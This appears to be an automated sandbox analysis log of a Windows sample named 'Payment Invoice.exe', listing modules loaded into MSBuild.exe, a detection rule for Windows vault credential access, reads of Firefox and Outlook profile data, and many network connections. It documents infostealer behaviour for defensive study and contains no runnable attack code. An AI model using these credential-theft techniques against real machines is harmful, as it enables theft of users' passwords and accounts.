                Source: C:\Users\user\Desktop\Payment Invoice.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@6/4@6/100
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7076
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\60288267-e0d8-48a8-9cbe-1e785d015ea0Jump to behavior
                Source: Payment Invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Payment Invoice.exeReversingLabs: Detection: 44%
                Source: unknownProcess created: C:\Users\user\Desktop\Payment Invoice.exe C:\Users\user\Desktop\Payment Invoice.exe
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7076 -s 101532
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exeJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exeJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Payment Invoice.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                Source: Payment Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Payment Invoice.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Payment Invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Payment Invoice.exeStatic PE information: 0xD3E4F956 [Wed Aug 26 19:36:54 2082 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C6A198 push esp; ret 5_2_00C6A199
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C6F420 push esp; retf 5_2_00C6F421
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C6E731 push ebp; retf 5_2_00C6E7E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C60C95 push edi; retf 5_2_00C60C3A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_00C60C3D push edi; ret 5_2_00C60CC2

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 30951
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 8800
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 31033
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 24183
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 26315
                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 36694
                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 55019
                Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 34144
                Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 37847
                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 9401
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 8197
                Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 18877
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 10710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 5775
                Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 51918
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 8090
                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 59870
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 26353
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 17145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 7777
                Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 57391
                Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 58386
                Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 8193
                Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 9401 -> 49845
                Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49906
                Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 10003
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49846
                Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 14282
                Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 9091
                Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 7853
                Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 7183
                Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 24279
                Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 1431
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49900
                Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 5430
                Source: unknownNetwork traffic detected: HTTP traffic on port 50197 -> 57364
                Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 59268
                Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 13477
                Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 40536
                Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 7777
                Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 42624
                Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 5000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50273 -> 10710
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 49852
                Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50062
                Source: unknownNetwork traffic detected: HTTP traffic on port 50128 -> 40975
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49898
                Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 34411
                Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 60080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 31908
                Source: unknownNetwork traffic detected: HTTP traffic on port 50295 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 9090 -> 49889
                Source: unknownNetwork traffic detected: HTTP traffic on port 50243 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 1337
                Source: unknownNetwork traffic detected: HTTP traffic on port 50278 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 7777
                Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 49904
                Source: unknownNetwork traffic detected: HTTP traffic on port 50231 -> 30000
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 24183
                Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 7891
                Source: unknownNetwork traffic detected: HTTP traffic on port 50299 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50186 -> 8800
                Source: unknownNetwork traffic detected: HTTP traffic on port 10003 -> 50016
                Source: unknownNetwork traffic detected: HTTP traffic on port 50288 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50422 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 18080 -> 49961
                Source: unknownNetwork traffic detected: HTTP traffic on port 50375 -> 42571
                Source: unknownNetwork traffic detected: HTTP traffic on port 50413 -> 6001
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 51918
                Source: unknownNetwork traffic detected: HTTP traffic on port 50429 -> 5432
                Source: unknownNetwork traffic detected: HTTP traffic on port 50289 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50292 -> 8000
                Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50450 -> 24543
                Source: unknownNetwork traffic detected: HTTP traffic on port 50325 -> 44195
                Source: unknownNetwork traffic detected: HTTP traffic on port 50408 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50419 -> 19599
                Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 57391
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 49478
                Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 50339 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50360 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50321 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50477 -> 3335
                Source: unknownNetwork traffic detected: HTTP traffic on port 50350 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 49202
                Source: unknownNetwork traffic detected: HTTP traffic on port 50359 -> 9123
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 18877
                Source: unknownNetwork traffic detected: HTTP traffic on port 50523 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50391 -> 27102
                Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 7302
                Source: unknownNetwork traffic detected: HTTP traffic on port 50400 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 12334
                Source: unknownNetwork traffic detected: HTTP traffic on port 50568 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 50543 -> 5123
                Source: unknownNetwork traffic detected: HTTP traffic on port 50529 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 50018
                Source: unknownNetwork traffic detected: HTTP traffic on port 50497 -> 27391
                Source: unknownNetwork traffic detected: HTTP traffic on port 50381 -> 31247
                Source: unknownNetwork traffic detected: HTTP traffic on port 50442 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50597 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50287 -> 9002
                Source: unknownNetwork traffic detected: HTTP traffic on port 50590 -> 5529
                Source: unknownNetwork traffic detected: HTTP traffic on port 50565 -> 24397
                Source: unknownNetwork traffic detected: HTTP traffic on port 50573 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50233
                Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50498 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 8090
                Source: unknownNetwork traffic detected: HTTP traffic on port 50567 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50485 -> 5678
                Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50544 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50614 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50512 -> 8880
                Source: unknownNetwork traffic detected: HTTP traffic on port 50651 -> 15303
                Source: unknownNetwork traffic detected: HTTP traffic on port 30000 -> 50231
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50299
                Source: unknownNetwork traffic detected: HTTP traffic on port 50575 -> 1081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50731 -> 27207
                Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 50429
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 24543 -> 50450
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50288
                Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50695 -> 29197
                Source: unknownNetwork traffic detected: HTTP traffic on port 50694 -> 31571
                Source: unknownNetwork traffic detected: HTTP traffic on port 50701 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50595 -> 8083
                Source: unknownNetwork traffic detected: HTTP traffic on port 50514 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50626 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 50337 -> 32824
                Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 40536
                Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 42624
                Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50187 -> 9990
                Source: unknownNetwork traffic detected: HTTP traffic on port 50788 -> 23685
                Source: unknownNetwork traffic detected: HTTP traffic on port 50640 -> 63055
                Source: unknownNetwork traffic detected: HTTP traffic on port 50840 -> 2233
                Source: unknownNetwork traffic detected: HTTP traffic on port 50700 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50684 -> 8182
                Source: unknownNetwork traffic detected: HTTP traffic on port 50867 -> 26693
                Source: unknownNetwork traffic detected: HTTP traffic on port 44195 -> 50325
                Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50714 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50708 -> 52858
                Source: unknownNetwork traffic detected: HTTP traffic on port 50720 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50857 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50077
                Source: unknownNetwork traffic detected: HTTP traffic on port 50874 -> 28723
                Source: unknownNetwork traffic detected: HTTP traffic on port 50742 -> 18080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 31679
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50597
                Source: unknownNetwork traffic detected: HTTP traffic on port 50805 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50754 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 50893 -> 10049
                Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 999
                Source: unknownNetwork traffic detected: HTTP traffic on port 50860 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50791 -> 7117
                Source: unknownNetwork traffic detected: HTTP traffic on port 50315 -> 82
                Source: unknownNetwork traffic detected: HTTP traffic on port 50977 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50321
                Source: unknownNetwork traffic detected: HTTP traffic on port 50913 -> 5432
                Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 45883
                Source: unknownNetwork traffic detected: HTTP traffic on port 50796 -> 6005
                Source: unknownNetwork traffic detected: HTTP traffic on port 50295 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 20001
                Source: unknownNetwork traffic detected: HTTP traffic on port 50792 -> 9090
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50887 -> 5430
                Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50498
                Source: unknownNetwork traffic detected: HTTP traffic on port 18080 -> 50607
                Source: unknownNetwork traffic detected: HTTP traffic on port 50897 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50113
                Source: unknownNetwork traffic detected: HTTP traffic on port 50961 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 5005
                Source: unknownNetwork traffic detected: HTTP traffic on port 50723 -> 58386
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50544
                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 49858
                Source: unknownNetwork traffic detected: HTTP traffic on port 50987 -> 58714
                Source: unknownNetwork traffic detected: HTTP traffic on port 51024 -> 9764
                Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 34411
                Source: unknownNetwork traffic detected: HTTP traffic on port 50984 -> 34411
                Source: unknownNetwork traffic detected: HTTP traffic on port 50930 -> 57144
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50442
                Source: unknownNetwork traffic detected: HTTP traffic on port 51035 -> 15673
                Source: unknownNetwork traffic detected: HTTP traffic on port 9123 -> 50359
                Source: unknownNetwork traffic detected: HTTP traffic on port 51030 -> 58703
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 51918
                Source: unknownNetwork traffic detected: HTTP traffic on port 1431 -> 50148
                Source: unknownNetwork traffic detected: HTTP traffic on port 51028 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 57391
                Source: unknownNetwork traffic detected: HTTP traffic on port 51036 -> 12334
                Source: unknownNetwork traffic detected: HTTP traffic on port 50901 -> 5000
                Source: unknownNetwork traffic detected: HTTP traffic on port 51011 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 50996 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51026 -> 7891
                Source: unknownNetwork traffic detected: HTTP traffic on port 51108 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 50316 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 17145 -> 49985
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 3933
                Source: unknownNetwork traffic detected: HTTP traffic on port 51064 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51056 -> 26887
                Source: unknownNetwork traffic detected: HTTP traffic on port 50189 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 5432 -> 50913
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50700
                Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 51096 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 7777
                Source: unknownNetwork traffic detected: HTTP traffic on port 51033 -> 8800
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 59243
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50805
                Source: unknownNetwork traffic detected: HTTP traffic on port 51027 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49932
                Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 50514
                Source: unknownNetwork traffic detected: HTTP traffic on port 51042 -> 1951
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50720
                Source: unknownNetwork traffic detected: HTTP traffic on port 51038 -> 8081
                Source: unknownNetwork traffic detected: HTTP traffic on port 51094 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50529
                Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 51039 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51134 -> 4145
                Source: unknownNetwork traffic detected: HTTP traffic on port 51165 -> 54917
                Source: unknownNetwork traffic detected: HTTP traffic on port 51097 -> 4153
                Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 8899
                Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 3128
                Source: unknownNetwork traffic detected: HTTP traffic on port 51065 -> 1080
                Source: unknownNetwork traffic detected: HTTP traffic on port 51151 -> 15291
                Source: unknownNetwork traffic detected: HTTP traffic on port 51155 -> 10513
                Source: unknownNetwork traffic detected: HTTP traffic on port 51157 -> 4145
